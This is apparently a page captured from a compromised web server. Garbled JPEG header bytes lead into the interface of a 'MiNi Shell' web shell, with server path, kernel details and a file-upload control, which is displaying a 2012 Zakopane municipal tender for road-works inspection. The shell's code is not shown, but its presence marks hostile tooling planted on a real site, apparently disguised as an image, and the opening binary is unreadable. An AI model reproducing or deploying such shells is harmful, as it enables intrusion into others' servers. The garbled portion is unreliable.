JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120808/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120808/171261-N-2012.html

<p class="kh_header"><b>Zakopane: BZP.271.88.2012 pełnienie obowiązków Inspektora Nadzoru inwestorskiego  nad :

1)	remontami  bieżącymi  nawierzchni jezdni wraz z elementami pasa drogowego dróg publicznych gminnych oraz dróg osiedlowych, dla których zarządcą jest Burmistrz Miasta Zakopane.
2)	modernizacja-remontem nawierzchni jezdni oraz chodników wraz z elementami pasa drogowego ul. T. Kościuszki i ul. M. Zaruskiego, których zarządcą jest Burmistrz Miasta Zakopane</b><br>
<b>Numer ogłoszenia: 171261 - 2012; data zamieszczenia: 08.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BZP.271.88.2012 pełnienie obowiązków Inspektora Nadzoru inwestorskiego  nad :

1)	remontami  bieżącymi  nawierzchni jezdni wraz z elementami pasa drogowego dróg publicznych gminnych oraz dróg osiedlowych, dla których zarządcą jest Burmistrz Miasta Zakopane.
2)	modernizacja-remontem nawierzchni jezdni oraz chodników wraz z elementami pasa drogowego ul. T. Kościuszki i ul. M. Zaruskiego, których zarządcą jest Burmistrz Miasta Zakopane.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest  pełnienie obowiązków Inspektora Nadzoru inwestorskiego nad:
Zadanie I- remontami  bieżącymi  nawierzchni jezdni wraz z elementami pasa drogowego dróg publicznych gminnych oraz dróg osiedlowych, dla których zarządcą jest Burmistrz Miasta Zakopane.
Zadanie II - modernizacją-remontem nawierzchni jezdni oraz chodników wraz z elementami pasa drogowego ul. T. Kościuszki i ul. M. Zaruskiego, których zarządcą jest Burmistrz Miasta Zakopane
zgodnie z ustawą  Prawo Budowlane ( Dz.U. z 2006r. nr 156 poz. 1118 z późniejszymi zmianami). 

Ponadto zamawiający wymaga:
Wykonawca musi zapewniać pełną dyspozycyjność. Inspektor nadzoru zobowiązany jest do codziennej bytności na budowie w czasie prowadzenia robót. Dodatkowo inspektor nadzoru zobowiązany jest do przybycia na budowę na wezwanie Zamawiającego w razie zaistniałej potrzeby w terminie  1  godziny  od telefonicznego powiadomienia.

Opis zakresu robót objętych nadzorem w zakresie Zadania I -  remontów bieżących nawierzchni jezdni:
-	frezowanie nawierzchni,
-	wyrównanie nawierzchni,
-	wykonanie nakładki z asfaltobetonu,   
-	remont nawierzchni asfaltobetonem na gorąco,
-	remont nawierzchni asfaltobetonem na zimno,
-	remont nawierzchni tłuczniowej,
-	remont nawierzchni modyfikowaną emulsją i grysami,
-	regenerację nawierzchni bitumicznej modyfikowaną emulsją i grysami,
-	ułożenie rur pod zjazdami,
-	regulację pionowa studni, wraz z odbudową nawierzchni,
-	regulację pionową studni z wymianą włazu na właz z koszem wraz z odbudową nawierzchni,
-	przebudowa studni wraz z wymianą włazu na właz z koszem,
-	wykonanie studni rewizyjnych,
-	uzupełnienie poboczy
-	montaż poręczy sprężystych, demontaż poręczy sprężystych, demontaż słupków odgradzających,
inne nie wyszczególnione prace konieczne do wykonania.

Opis zakresu robót objętych nadzorem w zakresie  Zadania II - modernizacji-remontu nawierzchni jezdni oraz chodników wraz z elementami pasa drogowego ul. T. Kościuszki i ul. M. Zaruskiego :

- chodnik po stronie południowej ul. Kościuszki
- chodnik po stronie północnej ul. Kościuszki
- parkingi z kostki granitowej po obu stronach jezdni ul. Kościuszki
-modernizacja nawierzchni jezdni ul. Kościuszki (szerokość jezdni 8 m )
-ulica  Mariusza Zaruskiego- chodniki 
-ulica M. Zaruskiego - nawierzchnia jezdni z asfaltobetonu Chodniki
-ulica M. Zaruskiego -  parkingi z kostki granitowej (po obu stronach jezdni)
-nawierzchnie (wzory na chodnikach i jezdni) z kostki granitowej i bazaltowej;  
      rozbiórka i ponowne ułożenie
 
-montaż płyty ostrzegawczej na przejściach dla pieszych
-rozebranie i odbudowa elementów małej architektury
-urządzenia obce (znaki drogowe, słupki ograniczające)
-przebudowa istniejących studzienek wodościekowych, kanalizacyjnych,     
          telekomunikacyjnych

-wykonanie  kanalizacji burzowej ulicy Mariusza  Zaruskiego
-wymiana instalacji oświetleniowej ulicy Kościuszki i ulicy Zaruskiego


STWiOR dla powyższych prac oraz przedmiary robót  znajdują się na stronie internetowej zamawiającego pod linkiem Zamówienia publiczne  - postępowania poniżej  wartości określonych art. 11.8 :

1)	Zakopane: BZP.271.78.2012 Ogłoszenie o przetargu nieograniczonym na wykonywanie remontów bieżących nawierzchni jezdni
2)	Zakopane: BZP.271.67.2012 Ogłoszenie o przetargu nieograniczonym na wykonanie remontu-modernizacji ul. Kościuszki i ul. Zaruskiego w Zakopanem.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium przetargowego</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca złoży stosowne oświadczenie

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże , że w ciągu ostatnich 3 lat przed  upływem terminu składania ofert  a jeżeli okres prowadzenia działalności jest krótszy w tym okresie  może wykazać się minimum  w sumie rocznym doświadczeniem w pełnieniu obowiązków Inspektora nadzoru w ramach robót drogowych 


Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca złoży stosowne oświadczenie

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże ,że dysponuje osobą posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności drogowej bez ograniczeń i legitymującą się minimum  rocznym  doświadczeniem zawodowym, należącą do właściwej izby samorządu zawodowego

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca złoży stosowne oświadczenie

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art.144 ust.1 ustawy zamawiający  uprzejmie informuje, że przewiduje    
  dokonanie  zmiany osoby/osób  przewidzianych do realizacji przedmiotu zamówienia,   
    przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego,     
   akceptującego nową wskazana przez wykonawcę  osobę w następujących przypadkach:

- śmierci, choroby lub innych zdarzeń losowych,
-niewywiązywania się  inspektora nadzoru  z obowiązków wynikających z umowy,
- jeżeli zmiana  inspektora nadzoru  stanie się konieczna z jakichkolwiek innych przyczyn 
  niezależnych od wykonawcy  (np. rezygnacji itp.).

      W przypadku zmiany   osoby pełniącej funkcje inspektora nadzoru  nowy inspektor  musi spełniać wymagania określone  przez zamawiającego w siwz.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia  publiczne postępowania poniżej  wartości  art.11.8<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Drogownictwa i Transportu
Urząd Miasta Zakopane
ul.Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2012 godzina 12:00, miejsce: Biuro ds zamówień publicznych pok. 8 
Urząd Miasta Zakopane
ul.Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie obowiązków Inspektora Nadzoru inwestorskiego  nad remontami  bieżącymi  nawierzchni jezdni wraz z elementami pasa drogowego dróg publicznych gminnych oraz dróg osiedlowych, dla których zarządcą jest Burmistrz Miasta Zakopane..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie obowiązków Inspektora Nadzoru inwestorskiego  nad remontami  bieżącymi  nawierzchni jezdni wraz z elementami pasa drogowego dróg publicznych gminnych oraz dróg osiedlowych, dla których zarządcą jest Burmistrz Miasta Zakopane.zgodnie z ustawą  Prawo Budowlane ( Dz.U. z 2006r. nr 156 poz. 1118 z późniejszymi zmianami). 

Ponadto zamawiający wymaga:
Wykonawca musi zapewniać pełną dyspozycyjność. Inspektor nadzoru zobowiązany jest do codziennej bytności na budowie w czasie prowadzenia robót. Dodatkowo inspektor nadzoru zobowiązany jest do przybycia na budowę na wezwanie Zamawiającego w razie zaistniałej potrzeby w terminie  1  godziny  od telefonicznego powiadomienia.

Opis zakresu robót objętych nadzorem w zakresie Zadania I -  remontów bieżących nawierzchni jezdni:
-	frezowanie nawierzchni,
-	wyrównanie nawierzchni,
-	wykonanie nakładki z asfaltobetonu,   
-	remont nawierzchni asfaltobetonem na gorąco,
-	remont nawierzchni asfaltobetonem na zimno,
-	remont nawierzchni tłuczniowej,
-	remont nawierzchni modyfikowaną emulsją i grysami,
-	regenerację nawierzchni bitumicznej modyfikowaną emulsją i grysami,
-	ułożenie rur pod zjazdami,
-	regulację pionowa studni, wraz z odbudową nawierzchni,
-	regulację pionową studni z wymianą włazu na właz z koszem wraz z odbudową nawierzchni,
-	przebudowa studni wraz z wymianą włazu na właz z koszem,
-	wykonanie studni rewizyjnych,
-	uzupełnienie poboczy
-	montaż poręczy sprężystych, demontaż poręczy sprężystych, demontaż słupków odgradzających,
inne nie wyszczególnione prace konieczne do wykonania.
STWiOR dla powyższych prac oraz przedmiary robót  znajdują się na stronie internetowej zamawiającego pod linkiem Zamówienia publiczne  - postępowania poniżej  wartości określonych art. 11.8 

Zakopane: BZP.271.78.2012 Ogłoszenie o przetargu nieograniczonym na wykonywanie remontów bieżących nawierzchni jezdni.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie obowiązków Inspektora Nadzoru inwestorskiego  nad modernizacją-remontem nawierzchni jezdni oraz chodników wraz z elementami pasa drogowego ul. T. Kościuszki i ul. M. Zaruskiego, których zarządcą jest Burmistrz Miasta Zakopane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie obowiązków Inspektora Nadzoru inwestorskiego  nad modernizacją-remontem nawierzchni jezdni oraz chodników wraz z elementami pasa drogowego ul. T. Kościuszki i ul. M. Zaruskiego, których zarządcą jest Burmistrz Miasta Zakopane, zgodnie z ustawą  Prawo Budowlane ( Dz.U. z 2006r. nr 156 poz. 1118 z późniejszymi zmianami). 

Ponadto zamawiający wymaga:
Wykonawca musi zapewniać pełną dyspozycyjność. Inspektor nadzoru zobowiązany jest do codziennej bytności na budowie w czasie prowadzenia robót. Dodatkowo inspektor nadzoru zobowiązany jest do przybycia na budowę na wezwanie Zamawiającego w razie zaistniałej potrzeby w terminie  1  godziny  od telefonicznego powiadomienia.


Opis zakresu robót objętych nadzorem w zakresie  Zadania II - modernizacji-remontu nawierzchni jezdni oraz chodników wraz z elementami pasa drogowego ul. T. Kościuszki i ul. M. Zaruskiego :

- chodnik po stronie południowej ul. Kościuszki
- chodnik po stronie północnej ul. Kościuszki
- parkingi z kostki granitowej po obu stronach jezdni ul. Kościuszki
-modernizacja nawierzchni jezdni ul. Kościuszki (szerokość jezdni 8 m )
-ulica  Mariusza Zaruskiego- chodniki 
-ulica M. Zaruskiego - nawierzchnia jezdni z asfaltobetonu Chodniki
-ulica M. Zaruskiego -  parkingi z kostki granitowej (po obu stronach jezdni)
-nawierzchnie (wzory na chodnikach i jezdni) z kostki granitowej i bazaltowej;  
      rozbiórka i ponowne ułożenie
 
-montaż płyty ostrzegawczej na przejściach dla pieszych
-rozebranie i odbudowa elementów małej architektury
-urządzenia obce (znaki drogowe, słupki ograniczające)
-przebudowa istniejących studzienek wodościekowych, kanalizacyjnych,     
          telekomunikacyjnych

-wykonanie  kanalizacji burzowej ulicy Mariusza  Zaruskiego
-wymiana instalacji oświetleniowej ulicy Kościuszki i ulicy Zaruskiego


STWiOR dla powyższych prac oraz przedmiary robót  znajdują się na stronie internetowej zamawiającego pod linkiem Zamówienia publiczne  - postępowania poniżej  wartości określonych art. 11.8 :

Zakopane: BZP.271.67.2012 Ogłoszenie o przetargu nieograniczonym na wykonanie remontu-modernizacji ul. Kościuszki i ul. Zaruskiego w Zakopanem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com